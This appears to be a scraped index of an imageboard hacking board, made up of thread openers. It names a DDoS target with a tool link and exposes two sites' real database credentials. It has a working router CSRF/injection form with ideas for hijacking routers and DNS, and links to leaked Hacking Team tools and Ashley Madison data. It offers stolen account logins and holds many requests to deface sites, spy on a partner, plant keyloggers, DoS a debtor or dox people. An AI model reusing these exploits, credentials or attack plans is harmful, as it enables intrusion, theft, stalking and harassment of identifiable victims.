Rothschild Capital Partners - www.ritcap.com - #OpIcarus
Rothschild Capital Partners - www.ritcap.com - #OpIcarus
66.155.26.148 - port 80
66.155.26.148 - port 25
Check whether site is down or not: http://www.isitdownrightnow.com/
Free VPN: http://www.cyberghostvpn.com
Free HOIC download - It will say its got adware when you download it but it doesn't.
https://sourceforge.net/projects/highorbitioncannon/
HOW TO USE HOIC TO TAKE DOWN WEBSITES (DDOS) LIKE A PRO FOR BEGINNERS
hack this website
don't shut it down just mess it up like screw with user profiles and the css and stuff like that
its a friends website he has been doing some back staby shit lately so i want somebody to hack it and cause some panic
https://insomniagaming.bitrix24.com/?current_fieldset=SOCSERV#send
Noice board.
Can I post all these infos? Cool.
/** MySQL Einstellungen - diese Angaben bekommst du von deinem Webhoster. */
/** Ersetze database_name_here mit dem Namen der Datenbank, die du verwenden möchtest. */
define('DB_NAME', 'oliverfriedli');
/** Ersetze username_here mit deinem MySQL-Datenbank-Benutzernamen */
define('DB_USER', 'oliverfriedli');
/** Ersetze password_here mit deinem MySQL-Passwort */
define('DB_PASSWORD', 'jftcid7y');
/** Ersetze localhost mit der MySQL-Serveradresse */
define('DB_HOST', 'localhost');
http://blog-haus.sven-und-tina.de
(You're too late btw)
// MySQL Einstellungen - diese Angaben bekommst du von deinem Webhoster //
/** Ersetze putyourdbnamehere mit dem Namen der Datenbank, die du verwenden möchtest. */
define('DB_NAME', db323164979);
/** Ersetze usernamehere mit deinem MySQL-Datenbank-Benutzernamen */
define('DB_USER', dbo323164979);
/** Ersetze yourpasswordhere mit deinem MySQL-Passwort */
define('DB_PASSWORD', tina2008);
/** Ersetze localhost mit der MySQL-Serveradresse */
define('DB_HOST', db2406.1und1.de);
Pic unrelated.
Start Hacking
Hi guys i just wanted to know where I am supposed to learn hacking begins . I know I must learn to program for example, but what language is most appropriate ?? And what are the fundamental knowledge to have a good grounding in computer science ? Thank you beforehand.
Can please someone help me
Can please someone help me get rid of a g+/youtube channel or at least tell me about simple tools i could use?
the account being : https://plus.google.com/u/0/+KeisersozayHTTC/about
The web ui on modems and routers are very insecure.
Found this in 15 minutes
<form action="http://192.168.0.1/scvrtsrv.cmd" method="post" target="hidden">
<input type="hidden" name="action" value="remove_port_forwarding">
<input type="hidden" name="needthankyou" value='BREAK"; alert("ayy lmao");//'>
<input type="hidden" name="rmLst" value="192.168.0.2|2777|2777|TCP|2777|2777|0.0.0.0">
<input type="submit" value="Go, Baby, Go!">
</form>
Imagine if you wrote 2 dozen router lock out exploits and loaded default passwords into a script somewhere and either got people to click the link or embedded it on a page.
or like set remote admin and change the password. Mabe fuck with DNS?
just a thought
nobully
#OpISIS TWITTER HACKING TOOLS https://www.mediafire.com/?qxajan2ydaj7559 https://anonfiles.com/file/
#OpISIS TWITTER HACKING TOOLS
https://www.mediafire.com/?qxajan2ydaj7559
https://anonfiles.com/file/aae02efaae751ff3aab5bf542bca5d36
The Password for #OpISIS-THT.7z is
—–→
We are Anonymous-We are Legion-Expect us
#OpISIS TWITTER HACKING TOOLS
Help Getting In
I need to get into here. I have basic computer skills and would like some help. The site allows unlimited entries. I know brute forcing is an option, but there has to be an easier way. Here is the site:
http://www.wayneumc.org/401/login.php?redirect=/church-directory.html
Help plox
Hey /hack/,
I've recently suspected that my GF is cheating on me. She is in another country for a few months.
I have knowledge about routing and switching and I'm not a complete Idiot, but, I have no idea how I would go about getting Info off her pc. I could get her to open a link, I think. Can Someone tell me how I would go about utilizing this?
What to do with this tmobile account?>
I have someone's Tmobile account available to me on this computer. This tmobile account has a saved credit card onto it. I have the password and phone number of this account.
I'm not really sure where to go from here though, any ideas? Possibly willing to give up the info.
Take action
I have a bunch of logins/passwords (social media accounts - twitter, YT, Wordpress) for a private sector funded UN org. They are totally full of shit and the people only care about their own jobs. Will put them here if there is anybody who wants to do something with it.Getting into a Note 4 remotely
I know nothing about this type of stuff, hopefully somebody can help. I need to install this webwatcher program in the target phone, so that I will be able to see texts,calls etc. Only prob is that target phone has fingerprint unlock and I can't get in. Can anyone help
Good tools for windows beginners?
Heya /hack/ I'm a real newb to hacking, and I'm doing my absolute best not to just be some script kiddie using proprietary software and premade mods and programs that promise to let you 'hax all the facebook n twitter with one easy button!' I want to lean the ropes, follow the tutorials, know exactly what it is I'm doing, and generally just build up a modest arsenal of knowledge and skills in a subject I find really interesting, data security. But the issue I have at every turn, one that, as a learner, makes me want to headbutt a brick wall until either my cranium or the bricks shatter, is that at the present I'm on Windows (10 to be precise) and verything seems to be written for Linux. Every utility, every tool, every scrap of software seems to be designed to run in Linux! Ov'e tried porting linux software (notably THC Hydra, Medusa and Metasploit) to windows with programs like 7zip and Cygwin, but that's just a bit out of my comfort zone right now, so here's my question; other than Cain and Abel and WireShark, which I can use already, what sort of free programs written hassle-free for windows can I install to learn and practice the basics of hacking/penetration testing?
So the past few days I've gotten over 30 e-mails from Steam Support telling me that somebody is trying to access my account. They give me an IP address and a code that I can put in to confirm that it's me. All of these connections are coming from Europe.
I've changed my password and security question several times and have scanned my computer for viruses and trojans (avast, superantispyware, malwarebytes) and have found nothing. Sometimes these messages come right after changing my password. I haven't yet tried changing my information from another computer. Could I maybe do it from a virtual machine?
How do I stop this and how can I retaliate? The IP in the pic has port 3389 open.
Ashley Madison Transactions GET THE REAL DEAL HERE!!!
Ashley Madison Transactions GET THE REAL DEAL HERE!!!
The Ashley Madison hacked transactions, it's full of names, and addresses, and email addresses too, 26 Excel files for you to use and search through!!! I'm sure that you will enjoy this immensely, and will be a useful resource for many years to come!
AMCCT-Excel.zip 837.9 MB
https://mega.nz/#!4hAm2ZBL!mK7CNohDE1V2rxeUMrA2VhHm-s2ABYb3yAQV3nadPvo
Windows 10 - All Secret Folders!
Windows 10 - All Secret Folders!
Action Center.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
Backup and Restore.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}
Credential Manager.{1206F5F1-0569-412C-8FEC-3204630DFB70}
Devices and Printers.{A8A91A66-3A7D-4424-8D24-04E180695C7A}
Display.{C555438B-3C23-4769-A71F-B6D3D9B6053A}
HomeGroup.{67CA7650-96E6-4FDD-BB43-A8E774F73A57}
Notification Area Icons.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
Recovery.{9FE63AFD-59CF-4419-9775-ABCC3849F861}
RemoteApp and Desktop Connections.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}
Speech Recognition.{58E3C745-D971-4081-9034-86E34B30836A}
Troubleshooting.{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}
Administrative Tools.{D20EA4E1-3957-11d2-A40B-0C5020524153}
All Tasks (Control Panel).{ED7BA470-8E54-465E-825C-99712043E01C}
AutoPlay.{9C60DE1E-E5FC-40f4-A487-460851A8D915}
BitLocker Drive Encryption.{D9EF8727-CAC2-4e60-809E-86F80A666C91}
Computer Folder.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}
Ease of Access Center.{D555645E-D4F8-4c29-A827-D93C859C4F2A}
Font Settings.{93412589-74D4-4E4E-AD0E-E0CB621440FD}
Get Programs.{15eae92e-f17a-4431-9f28-805e482dafd4}
Manage Wireless Networks.{1FA9085F-25A2-489B-85D4-86326EEDCD87}
Network and Sharing Center.{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}
Network Connections.{7007ACC7-3202-11D1-AAD2-00805FC1270E}
Network Folder.{208D2C60-3AEA-1069-A2D7-08002B30309D}
Parental Controls.{96AE8D84-A250-4520-95A5-A47A7E3C548B}
Personalization.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}
Power Options.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
Programs and Features.{7b81be6a-ce2b-4676-a29e-eb907a5126c5}
Sync Center.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}
System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
User Accounts.{60632754-c523-4b62-b45c-4172da012619}
Windows Firewall.{4026492F-2F69-46B8-B9BF-5654FC07E423}
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
BLACK HAT HACKER PROJECTS.pdf (14MB)
BLACK HAT HACKER PROJECTS.pdf (14MB)
https://anonfiles.com/file/228c258c725faefa7e6d1cc4a332898e
https://mega.nz/#!1VBmjBJB!uVUQn_Cs-XLzQe186mUVHd-Mj5F_mT8qNEen7px5mbY
DEFCON 23 .zip 753.1 MB
DEFCON 23 .zip 753.1 MB
https://mega.nz/#!gUUGQYgY!GnKbO57EAcYrdpcmP6Sllk5758AmJ1E5xbzOQR-Dzn8
Q&A Thread
Ask your stupid and not-stupid questions here.Convince me that all hackers aren't faggots
Hello, /hack/, in my years as a programmer, i've seen some retarded shit. About 90% of that retarded shit has been done by "hacker".Action Replay Hacking and Porting
I'm trying to port a GameCube AR code from PAL to NTSC-U. I basically have no idea what I'm doing.
Practically all of the tutorials I have seen online are over a decade old and written for people with a basic skill set that I do not possess.
Most game-hacking pros I've found don't have time to help an imbecile. I'd like to crack into game hacking as a hobby, but it's tough when you have no fucking clue where the maze begins.
How do I port this code?
Metal Gear Solid: The Twin Snakes (GCN/WIIRD/PAL)
Walk Through Walls On/Off (Press C-Stick Up/Down)
04004400 7F01BAF8
04004404 7F01C424
28571748 FF000080
48000000 80004400
14000000 60000000
48000000 80004404
14000000 48000170
E2000001 80008000
28571748 FF000040
48000000 80004400
14000000 48000735
48000000 80004404
14000000 41820170
E2000001 80008000
Does anyone have a link to a useful series of tutorials for n00bs? I want to find out how AR codes are discovered and created.
HACKING TEAM Books.zip 883.1 MB DOWNLOAD NOW
HACKING TEAM Books.zip 883.1 MB DOWNLOAD NOW
https://mega.co.nz/#!IdFVzBaC!lcVbbi03S04enjKgqNDmLY9-bQW1XsW7dyB5sgorDkA
HACKING TEAM TOOLS.zip 1.29 GB DOWNLOAD NOW!!!
HACKING TEAM TOOLS.zip 1.29 GB DOWNLOAD NOW!!!
https://mega.co.nz/#!oZdx3C6b!yxNy7EqnVNRwNSzB3IhGBpIQhe-Eu1ScEIFypoWRqD0
In what order do I, as someone with little information on not just network security but programming and new to linux, start and where do I end? Do I learn programming first, then network structure, or vice versa? What about fully understanding linux, is that required?
An order in which to do things would be nice. Im not even sure quite where to begin, and is kali really necessary, I have arch.
HACKER TOOLS & EXPLOITS COLLECTIONS.zip 981.3 MB https://mega.co.nz/#!EI0gnZBL!vIkD3mM_9f9MZYvgJahQ0
DOWNLOAD it now, I recently had a spasm of looking for and downloading hacking tools, could have got TONE more, but the links weren't working after what was offered, however what I have here I think is substantial indeed!
HAPPY HACKING!!!!!!!
HACKER TOOLS & EXPLOITS COLLECTIONS.zip 981.3 MB
https://mega.co.nz/#!EI0gnZBL!vIkD3mM_9f9MZYvgJahQ0rTlf_WWF0UG9HGdP9vBikg
BLACKHATS COLLECTION.zip 2.17 GB
Here it is, this is a TON of tools and files you need to download and take a look at!!!
Enjoy!!!
BLACKHATS COLLECTION.zip 2.17 GB
https://mega.co.nz/#!ZdVSXTAB!CMD_yM7pZH12Rvqfkd7MoDc8mzQr0d7FXtpjvkDuMsY
The PASSWORD Is:
———————-→>>
Anon-7777777☠HACK☠NOW☠OR☠DIE☠☠☠☠☠☠☠NOTICE:☢+☣+☪+☫+✡+卐+☭=☠
How would I go about uncovering online accounts if I know the person's full name, family, and other social media info?
My target is not exactly web-savvy, but I know there must be one or two accounts the target owns that are not facebook/instagram/etc.
What I'm doing is pretty much d0xing in reverse since I'm working from the real name to anonymous accounts, not the other way around.
If this is not the place for it, please direct me to a better board.
Dumping Pedophiles
Just some pedophiles that I caught in a chatroom that I'm sharing with you guys. I don't have the time to do anything with them myself. So I'll leave it up to you guys. http://pastebin.com/3jncQfZM
>pic unrelated
Site of my school has various security holes (mainly XSS). Do your worst: http://www.fadi.at/
Any good keyloggers
sup /hack/, i am planing to plant an keylogger on someones phone and or computer. I am planning on sending it by mail or at least sending a link to where the person could download my file from.Cyberspace gang warfare
Saw some post a while ago which read like this (paraphrasing):Help ._.
Reckon any of you folk are able to find the password to a RAR file or know how to bypass a rar's password?Youtube resources
Lots of assorted basics: http://networkingprogramming.com/1024x768/index.htmlResources thread
Let's get this party started. Post your favourite netsec-related resources here. We'll compile a community list and order it by topic. Then we also need to get more people in here so we actually have others to talk with.Hak5 Rubber Ducky
So i recently recieved this from a friend: https://hakshop.myshopify.com/products/usb-rubber-ducky-deluxeHelp with SQL
So I've found a site that's vulnerable to SQL, and I've found a username/password combination, but it's hashed and according to a hash identifier either SHA-2 or HAVAL-256, which I assume I can't break. How should I proceed?Help a tard!
Sup guys, I need some help. I might or might not have a stalker, I only know that this bitch is from Poland. She has a fake facebook account:Hacker Lobe Exercising
Can we get a thread where post puzzles/challenges/brainteasers that put you in the hacker mind set? I'll start off with one from a book, because I don't know of any more like it.Wordpress
(Supposedly) like 20% of websites run on Wordpress. Considering it's updated often, is it almost never vulnerable?Dox board
I don't know if this is relevant to this board, but I found this board about doxxing, and I hope the people might contribute to it. Here's a thread with some info in it:Game hacking: BLR
I've been wanting to know how to hack an fps game called Black Light Retribution for a while now. Yes I know it's old, but hopefully the fact that it hasn't been updated in nearly a year means it will be easier to hack.Need help hacking a simple image site!
Hey friends, sorry if i come across as a newfag for this whole hacking thing, and truth be told, i know jack shit about any sort of hacking, even the most simple things, i'm sure i don't know about.Netsec books general
http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504Just a Tip
You can find deleted Outlook emails very, very easily. Find the particular install's .pst and use to hex editor to set bytes 7-12 or 7-13 to 0. Save the changes and then use the included Outlook repair tool to repair the .pst. When after the program fixes itself, all deleted emails return.Need help to DOS the shit out of a certain kid.
So basically there's this guy that owes me quite a large debt. I managed to obtain his IP address, but I've no idea what to do from here as I am new to these procedures. So I leave it up to you, beautiful and handsome people, to DOS him or attack him somehow or whatever. Here's the information:Spam my board
Sup. Started a new board.Pls find out ip
find out ip faggots http://ask.fm/sanningenomnypan